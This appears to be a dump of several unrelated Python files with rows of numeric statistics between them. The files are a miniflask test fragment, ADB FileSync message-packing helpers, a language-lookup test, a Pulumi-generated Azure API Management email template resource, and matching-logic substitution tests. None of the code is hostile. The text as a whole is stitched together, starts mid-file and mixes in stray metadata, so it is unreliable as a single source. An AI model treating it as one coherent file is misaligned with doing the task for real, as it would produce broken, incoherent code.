"--var_default_override_twice_and_cli", "1114"
])
captured = capsys.readouterr()
mf.event.print_all()
captured = capsys.readouterr()
assert captured.out == """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 12
modules.defaults.var_default_override_twice: 113
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
def test_override_conflict():
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults", "defaults2", "defaults_override"])
with pytest.raises(miniflask.exceptions.RegisterError):
mf.parse_args([])
mf.event.print_all()
def test_override_scoped_absolute():
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults", "defaults2", "defaults_override_scoped_absolute"])
mf.parse_args([])
mf.event.print_all()
def test_override_scoped_relative():
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults", "defaults2", "defaults_override_scoped_relative"])
mf.parse_args([])
mf.event.print_all()
| 26.752475
| 75
| 0.690229
| 327
| 2,702
| 5.357798
| 0.171254
| 0.085616
| 0.123288
| 0.171233
| 0.892123
| 0.892123
| 0.870434
| 0.855594
| 0.855594
| 0.855594
| 0
| 0.019811
| 0.178016
| 2,702
| 100
| 76
| 27.02
| 0.769023
| 0.003701
| 0
| 0.682927
| 0
| 0
| 0.341636
| 0.255019
| 0
| 0
| 0
| 0
| 0.036585
| 1
| 0.073171
| false
| 0
| 0.036585
| 0
| 0.109756
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4722ce518587afc5600253749d9a55bc2812ac1
| 3,392
|
py
|
Python
|
tests/filesync_helpers.py
|
KOLANICH-libs/adb_shell
|
bf4d348e3aa0999b24976de9bac442b0e180a27e
|
[
"Apache-2.0"
] | 268
|
2019-09-25T16:38:51.000Z
|
2022-03-31T07:08:17.000Z
|
tests/filesync_helpers.py
|
cyanogen/adb_shell
|
d60d94c831a23ffbe595aba045e7def6412f040c
|
[
"Apache-2.0"
] | 73
|
2019-09-30T14:25:38.000Z
|
2022-01-23T23:04:29.000Z
|
tests/filesync_helpers.py
|
cyanogen/adb_shell
|
d60d94c831a23ffbe595aba045e7def6412f040c
|
[
"Apache-2.0"
] | 48
|
2019-11-05T20:37:59.000Z
|
2022-03-09T08:12:06.000Z
|
import struct
from adb_shell import constants
class FileSyncMessage(object): # pylint: disable=too-few-public-methods
"""A helper class for packing FileSync messages.
Parameters
----------
command : bytes
TODO
arg0 : int
TODO
data : bytes
The data that will be sent
Attributes
----------
arg0 : int
TODO
command : int
The input parameter ``command`` converted to an integer via :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
data : bytes
The data that will be sent
"""
def __init__(self, command, arg0=None, data=b''):
self.command = constants.FILESYNC_ID_TO_WIRE[command]
self.arg0 = arg0 or len(data)
self.data = data
def pack(self):
"""Returns this message in an over-the-wire format.
Returns
-------
bytes
The message packed into the format required by ADB
"""
return struct.pack(b'<2I', self.command, self.arg0)
class FileSyncListMessage(object): # pylint: disable=too-few-public-methods
"""A helper class for packing FileSync messages for the "list" service".
Parameters
----------
command : bytes
TODO
arg0 : int
TODO
arg1 : TODO
TODO
arg2 : TODO
TODO
data : bytes
The data that will be sent
Attributes
----------
arg0 : int
TODO
arg1 : TODO
TODO
arg2 : TODO
TODO
arg3 : int
The size of the data
command : int
The input parameter ``command`` converted to an integer via :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
data : bytes
TODO
"""
def __init__(self, command, arg0, arg1, arg2, data=b''):
self.command = constants.FILESYNC_ID_TO_WIRE[command]
self.arg0 = arg0
self.arg1 = arg1
self.arg2 = arg2
self.arg3 = len(data)
self.data = data
def pack(self):
"""Returns this message in an over-the-wire format.
Returns
-------
bytes
The message packed into the format required by ADB
"""
return struct.pack(b'<5I', self.command, self.arg0, self.arg1, self.arg2, self.arg3)
class FileSyncStatMessage(object): # pylint: disable=too-few-public-methods
"""A helper class for packing FileSync messages for the "stat" service".
Parameters
----------
command : bytes
TODO
arg0 : int
TODO
arg1 : TODO
TODO
arg2 : TODO
TODO
Attributes
----------
arg0 : int
TODO
arg1 : TODO
TODO
arg2 : TODO
TODO
command : int
The input parameter ``command`` converted to an integer via :const:`adb_shell.constants.FILESYNC_ID_TO_WIRE`
data : bytes
The data that will be sent (always empty)
"""
def __init__(self, command, arg0, arg1, arg2):
self.command = constants.FILESYNC_ID_TO_WIRE[command]
self.arg0 = arg0
self.arg1 = arg1
self.arg2 = arg2
self.data = b''
def pack(self):
"""Returns this message in an over-the-wire format.
Returns
-------
bytes
The message packed into the format required by ADB
"""
return struct.pack(b'<4I', self.command, self.arg0, self.arg1, self.arg2)
| 23.887324
| 116
| 0.576946
| 412
| 3,392
| 4.667476
| 0.18932
| 0.051482
| 0.034321
| 0.065523
| 0.895476
| 0.884035
| 0.884035
| 0.835673
| 0.799272
| 0.799272
| 0
| 0.020897
| 0.322818
| 3,392
| 141
| 117
| 24.056738
| 0.816282
| 0.535083
| 0
| 0.5
| 0
| 0
| 0.007867
| 0
| 0
| 0
| 0
| 0.184397
| 0
| 1
| 0.214286
| false
| 0
| 0.071429
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f17590f06958ae329687c226a4efcfda1e72979c
| 178
|
py
|
Python
|
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
tests/test__languages.py
|
vsvandelik/cubbitt-fixer
|
eacab30975b9087b7f1a987402dc70bedb16c4bf
|
[
"MIT"
] | null | null | null |
from fixer._languages import Languages
def test_get_language():
assert Languages.get_language("cs") == Languages.CS
assert Languages.get_language("en") == Languages.EN
| 25.428571
| 55
| 0.752809
| 23
| 178
| 5.608696
| 0.478261
| 0.255814
| 0.27907
| 0.403101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 178
| 6
| 56
| 29.666667
| 0.837662
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74d3c5e17bd77edfb1fd69d8b0fdbd796a5870a4
| 22,425
|
py
|
Python
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/apimanagement/email_template.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['EmailTemplateArgs', 'EmailTemplate']
@pulumi.input_type
class EmailTemplateArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
body: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
subject: pulumi.Input[str],
template_name: pulumi.Input[str]):
"""
The set of arguments for constructing a EmailTemplate resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "body", body)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "subject", subject)
pulumi.set(__self__, "template_name", template_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def body(self) -> pulumi.Input[str]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: pulumi.Input[str]):
pulumi.set(self, "body", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def subject(self) -> pulumi.Input[str]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@subject.setter
def subject(self, value: pulumi.Input[str]):
pulumi.set(self, "subject", value)
@property
@pulumi.getter(name="templateName")
def template_name(self) -> pulumi.Input[str]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@template_name.setter
def template_name(self, value: pulumi.Input[str]):
pulumi.set(self, "template_name", value)
@pulumi.input_type
class _EmailTemplateState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering EmailTemplate resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] description: The description of the Email Template.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] title: The title of the Email Template.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if body is not None:
pulumi.set(__self__, "body", body)
if description is not None:
pulumi.set(__self__, "description", description)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if subject is not None:
pulumi.set(__self__, "subject", subject)
if template_name is not None:
pulumi.set(__self__, "template_name", template_name)
if title is not None:
pulumi.set(__self__, "title", title)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def body(self) -> Optional[pulumi.Input[str]]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "body", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Email Template.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def subject(self) -> Optional[pulumi.Input[str]]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@subject.setter
def subject(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subject", value)
@property
@pulumi.getter(name="templateName")
def template_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@template_name.setter
def template_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template_name", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the Email Template.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
class EmailTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a API Management Email Template.
## Import
API Management Email Templates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EmailTemplateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a API Management Email Template.
## Import
API Management Email Templates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
```
:param str resource_name: The name of the resource.
:param EmailTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EmailTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EmailTemplateArgs.__new__(EmailTemplateArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if body is None and not opts.urn:
raise TypeError("Missing required property 'body'")
__props__.__dict__["body"] = body
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if subject is None and not opts.urn:
raise TypeError("Missing required property 'subject'")
__props__.__dict__["subject"] = subject
if template_name is None and not opts.urn:
raise TypeError("Missing required property 'template_name'")
__props__.__dict__["template_name"] = template_name
__props__.__dict__["description"] = None
__props__.__dict__["title"] = None
super(EmailTemplate, __self__).__init__(
'azure:apimanagement/emailTemplate:EmailTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None) -> 'EmailTemplate':
"""
Get an existing EmailTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] description: The description of the Email Template.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] title: The title of the Email Template.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EmailTemplateState.__new__(_EmailTemplateState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["body"] = body
__props__.__dict__["description"] = description
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["subject"] = subject
__props__.__dict__["template_name"] = template_name
__props__.__dict__["title"] = title
return EmailTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter
def body(self) -> pulumi.Output[str]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
The description of the Email Template.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def subject(self) -> pulumi.Output[str]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@property
@pulumi.getter(name="templateName")
def template_name(self) -> pulumi.Output[str]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@property
@pulumi.getter
def title(self) -> pulumi.Output[str]:
"""
The title of the Email Template.
"""
return pulumi.get(self, "title")
| 54.297821
| 678
| 0.697926
| 2,408
| 22,425
| 6.306478
| 0.077243
| 0.058672
| 0.07283
| 0.055051
| 0.874424
| 0.850125
| 0.825365
| 0.807652
| 0.791914
| 0.760767
| 0
| 0.004022
| 0.212709
| 22,425
| 412
| 679
| 54.429612
| 0.856131
| 0.454716
| 0
| 0.568465
| 1
| 0
| 0.109552
| 0.007857
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157676
| false
| 0.004149
| 0.020747
| 0
| 0.273859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7771690ab1807cb9139ad27926f0a236d63c83a7
| 5,778
|
py
|
Python
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 1
|
2020-12-20T05:35:33.000Z
|
2020-12-20T05:35:33.000Z
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 23
|
2021-03-01T00:13:19.000Z
|
2022-02-21T11:21:58.000Z
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 3
|
2020-11-19T02:00:24.000Z
|
2021-04-27T17:51:32.000Z
|
from aml import *
def test_free_variables() -> None:
assert EVar("x").free_variables() == set([EVar("x")])
assert SVar("x").free_variables() == set([SVar("x")])
assert Symbol("s").free_variables() == set()
assert And(EVar("x"), SVar("x")).free_variables() == set([EVar("x"), SVar("x")])
assert And(EVar("x"), SVar("y")).free_variables() == set([EVar("x"), SVar("y")])
assert Or(EVar("x"), SVar("x")).free_variables() == set([EVar("x"), SVar("x")])
assert Or(EVar("x"), SVar("y")).free_variables() == set([EVar("x"), SVar("y")])
assert App(EVar("x"), SVar("x")).free_variables() == set([EVar("x"), SVar("x")])
assert App(EVar("x"), SVar("y")).free_variables() == set([EVar("x"), SVar("y")])
assert Not(And(EVar("x"), SVar("x"))).free_variables() == set([EVar("x"), SVar("x")])
assert Not(And(EVar("x"), SVar("y"))).free_variables() == set([EVar("x"), SVar("y")])
assert Exists(EVar("x"), SVar("x")).free_variables() == set([SVar("x")])
assert Exists(EVar("x"), EVar("x")).free_variables() == set()
assert Forall(EVar("x"), SVar("x")).free_variables() == set([SVar("x")])
assert Forall(EVar("x"), EVar("x")).free_variables() == set()
assert Mu(SVar("x"), EVar("x")).free_variables() == set([EVar("x")])
assert Mu(SVar("x"), SVar("x")).free_variables() == set()
assert Nu(SVar("x"), EVar("x")).free_variables() == set([EVar("x")])
assert Nu(SVar("x"), SVar("x")).free_variables() == set()
def test_substitute() -> None:
assert Exists(EVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("x"), EVar("x"))
assert Exists(EVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("x"), SVar("x"))
assert Exists(EVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("y"), EVar("v"))
assert Exists(EVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("y"), SVar("x"))
assert Exists(EVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("x"), EVar("x"))
assert Exists(EVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("x"), EVar("v"))
assert Exists(EVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("y"), EVar("x"))
assert Exists(EVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("y"), EVar("v"))
assert Forall(EVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("x"), EVar("x"))
assert Forall(EVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("x"), SVar("x"))
assert Forall(EVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("y"), EVar("v"))
assert Forall(EVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("y"), SVar("x"))
assert Forall(EVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("x"), EVar("x"))
assert Forall(EVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("x"), EVar("v"))
assert Forall(EVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("y"), EVar("x"))
assert Forall(EVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("y"), EVar("v"))
assert Mu(SVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("x"), EVar("v"))
assert Mu(SVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("x"), SVar("x"))
assert Mu(SVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("y"), SVar("x"))
assert Mu(SVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("y"), EVar("v"))
assert Mu(SVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("x"), EVar("x"))
assert Mu(SVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("x"), SVar("x"))
assert Mu(SVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("y"), EVar("x"))
assert Mu(SVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("y"), EVar("v"))
